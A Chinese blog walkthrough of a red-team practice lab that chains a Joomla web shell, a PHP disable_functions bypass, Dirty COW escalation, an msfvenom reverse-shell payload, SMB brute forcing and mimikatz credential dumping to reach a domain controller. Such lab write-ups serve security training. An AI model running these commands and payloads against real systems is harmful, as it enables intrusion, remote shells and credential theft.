百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 热门文章 > 正文

ATT&CK实战系列--红队实战(devgru红队)

bigegpt 2024-08-02 11:07 9 浏览

通过以往文章的靶场二,学习了msf免杀上线绕过360、Access Token利用(MSSQL利用)、WMI利用、域漏洞利用、域控信息收集和权限维持(黄金票据利用)。靶场三为黑盒测试,不提供虚拟机账号密码,目标是获取域控的flag文件,一起来看看如何去渗透吧。

0x00:环境搭建

ATT&CK实战系列——红队实战(三)是红日安全团队出品的一个实战环境,该靶场模拟真实环境,是个黑盒测试,不提供虚拟机密码。目标是域控中存在一份重要文件。具体的IP配置如下:

web-centos:192.168.93.100

外网:192.168.31.68

web-ubantu:192.168.93.120

win2012:192.168.93.10

win2008:192.168.93.20

win7:192.168.93.30

只有centos是双网卡,其余都是单网卡,将centos网卡eth0设置为自动获取ip

vim /etc/sysconfig/network-scripts/ifcfg-eth0
/etc/init.d/network restart    #设置好后重启网络服务

0x01:漏洞利用

先对目标ip进行端口扫描发现目标主机开放了22、80、3306端口

访问80端口的网页,发现是用Joomla搭建的网站

先使用dirsearch扫一下目录,发现了1.php是phpinfo文件,Joomla后台登录地址, 配置文件泄漏了数据库的账号密码

试试连接一下数据库,成功登录数据库,但是Joomla后台登录的管理员密码解密不出来。

Joomla官网有重置管理员密码的操作,执行sql语句来添加一个管理员chan sectret

成功添加账号后登录到后台,通过修改模版来拿shell

访问extensions-templates-templates-beez3,然后new file-新建文件chan.php

使用蚁剑连接成功后,但是执行命令返回的是127

查看1.php文件的配置情况,服务端 disable_functions 禁用了命令执行函数,目标是Linux并且没有禁用putenv函数,所以可以利用LD_PRELOAD绕过

这里直接使用蚁剑的插件,但是连接不上去(tmp目录下成功上传了.so文件网站目录也成功上传了.antproxy.php文件),不知道为什么。

后面使用PHP7_GC_UAF模式成功执行命令

后面看见师傅用的另一种方法利用LD_PRELOAD绕过,用蚁剑bypass_diablefunc.php 和 bypass_diablefunc_x64.so 上传到目标的同一目录

注意 .so 文件需要根据目标系统架构选择,然后访问bypass_diablefunc.php,cmd 是执行的命令,outpath是读写权限的目录,sopath是.so文件的绝对路径

http://192.168.31.168/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/baji&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so

先进行一些基本的信息收集,发现当前 ip为192.168.93.120并不是centos,内核是ubuntu说明真正的web服务后端在 ubuntu,通过centos做了个nginx反向代理解析到Ubuntu上。

翻下主机的文件发现了/tmp/mysql/test.txt文件存在账户密码

使用ssh连接一下,成功连接,先看一下基本信息

发现Centos内核版本在脏牛提权的范围内,先尝试一下sudo提权和suid提权,发现不行,使用脏牛提权,将dirty.c上传到centos,使用命令gcc -pthread dirty.c -o dirty -lcrypt

切换到firefart用户,提权成功

0x02:内网渗透

在kali上生成chan.elf,设置监听,将elf文件上传到centos,执行后攻击机成功获得一个meterpreter

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.254 LPORT=4444 -f elf > /var/www/html/chan.elf

添加路由进行存活主机探测,或者使用ping命令

run autoroute -s 192.168.93.0/24
background
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.0/24
exploit


for k in $( seq 1 255);do ping -c 1 192.168.93.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

发现了三台存活的TEST域的主机

192.168.93.10  windows 2012
192.168.93.20  windows 2008
192.168.93.30  windows 7

使用msf自带的模块进行端口扫描,发现三台主机开放了135、445端口

使用msf自带的ms17-010模块扫描一波,没有发现漏洞

使用msf的模块进行爆破 我这里没有爆破成功,看到其他师傅爆破出来密码是123qwe!ASD

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.20
set SMBUser administrator
set PASS_FILE /usr/share/wordlists/top1000.txt
exploit

使用爆破成功的密码进行渗透,使用msf开个sock4正向代理,配合proxychains

使用wmicexec远程连接这两台主机,先进行基本的信息搜集,ipconfig /all知道DNS服务器即域控是192.68.93.10

proxychains python3 wmiexec.py -debug

'administrator:123qwe!ASD@192.168.93.20'

proxychains python3 wmiexec.py -debug

'administrator:123qwe!ASD@192.168.93.30'

在windows 2008主机上使用tasklist /v查看进程发现TEST域进程域管理员,尝试抓取其密码

在kali上使用smbclient连接到windows 2008上传mimikatz

wmiexec远程执行mimikatz 成功得到抓取到域管理员密码

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log

现在已经知道域控的账号密码了,同样的方法使用wmiexec.py脚本进行连接域控,找到flag文件

0x03:总结

在搭建靶场时,环境遇到了问题,折腾了很久好在还是解决了。靶场大概情况为centos为出网机,web服务后端在 ubuntu,通过centos做了个nginx反向代理解析到Ubuntu上,域内有三台Windows主机。渗透过程是通过配置文件泄漏了数据库账号密码,从而添加Joomla管理员进入后台上传shell,disable_function的绕过(这个姿势学习到了),然后msf获取一个meterpreter来进行内网渗透,最终拿下域控获取flag。

相关推荐

得物可观测平台架构升级:基于GreptimeDB的全新监控体系实践

一、摘要在前端可观测分析场景中,需要实时观测并处理多地、多环境的运行情况,以保障Web应用和移动端的可用性与性能。传统方案往往依赖代理Agent→消息队列→流计算引擎→OLAP存储...

warm-flow新春版:网关直连和流程图重构

本期主要解决了网关直连和流程图重构,可以自此之后可支持各种复杂的网关混合、多网关直连使用。-新增Ruoyi-Vue-Plus优秀开源集成案例更新日志[feat]导入、导出和保存等新增json格式支持...

扣子空间体验报告

在数字化时代,智能工具的应用正不断拓展到我们工作和生活的各个角落。从任务规划到项目执行,再到任务管理,作者深入探讨了这款工具在不同场景下的表现和潜力。通过具体的应用实例,文章展示了扣子空间如何帮助用户...

spider-flow:开源的可视化方式定义爬虫方案

spider-flow简介spider-flow是一个爬虫平台,以可视化推拽方式定义爬取流程,无需代码即可实现一个爬虫服务。spider-flow特性支持css选择器、正则提取支持JSON/XML格式...

solon-flow 你好世界!

solon-flow是一个基础级的流处理引擎(可用于业务规则、决策处理、计算编排、流程审批等......)。提供有“开放式”驱动定制支持,像jdbc有mysql或pgsql等驱动,可...

新一代开源爬虫平台:SpiderFlow

SpiderFlow:新一代爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。-精选真开源,释放新价值。概览Spider-Flow是一个开源的、面向所有用户的Web端爬虫构建平台,它使用Ja...

通过 SQL 训练机器学习模型的引擎

关注薪资待遇的同学应该知道,机器学习相关的岗位工资普遍偏高啊。同时随着各种通用机器学习框架的出现,机器学习的门槛也在逐渐降低,训练一个简单的机器学习模型变得不那么难。但是不得不承认对于一些数据相关的工...

鼠须管输入法rime for Mac

鼠须管输入法forMac是一款十分新颖的跨平台输入法软件,全名是中州韵输入法引擎,鼠须管输入法mac版不仅仅是一个输入法,而是一个输入法算法框架。Rime的基础架构十分精良,一套算法支持了拼音、...

Go语言 1.20 版本正式发布:新版详细介绍

Go1.20简介最新的Go版本1.20在Go1.19发布六个月后发布。它的大部分更改都在工具链、运行时和库的实现中。一如既往,该版本保持了Go1的兼容性承诺。我们期望几乎所...

iOS 10平台SpriteKit新特性之Tile Maps(上)

简介苹果公司在WWDC2016大会上向人们展示了一大批新的好东西。其中之一就是SpriteKitTileEditor。这款工具易于上手,而且看起来速度特别快。在本教程中,你将了解关于TileE...

程序员简历例句—范例Java、Python、C++模板

个人简介通用简介:有良好的代码风格,通过添加注释提高代码可读性,注重代码质量,研读过XXX,XXX等多个开源项目源码从而学习增强代码的健壮性与扩展性。具备良好的代码编程习惯及文档编写能力,参与多个高...

Telerik UI for iOS Q3 2015正式发布

近日,TelerikUIforiOS正式发布了Q32015。新版本新增对XCode7、Swift2.0和iOS9的支持,同时还新增了对数轴、不连续的日期时间轴等;改进TKDataPoin...

ios使用ijkplayer+nginx进行视频直播

上两节,我们讲到使用nginx和ngixn的rtmp模块搭建直播的服务器,接着我们讲解了在Android使用ijkplayer来作为我们的视频直播播放器,整个过程中,需要注意的就是ijlplayer编...

IOS技术分享|iOS快速生成开发文档(一)

前言对于开发人员而言,文档的作用不言而喻。文档不仅可以提高软件开发效率,还能便于以后的软件开发、使用和维护。本文主要讲述Objective-C快速生成开发文档工具appledoc。简介apple...

macOS下配置VS Code C++开发环境

本文介绍在苹果macOS操作系统下,配置VisualStudioCode的C/C++开发环境的过程,本环境使用Clang/LLVM编译器和调试器。一、前置条件本文默认前置条件是,您的开发设备已...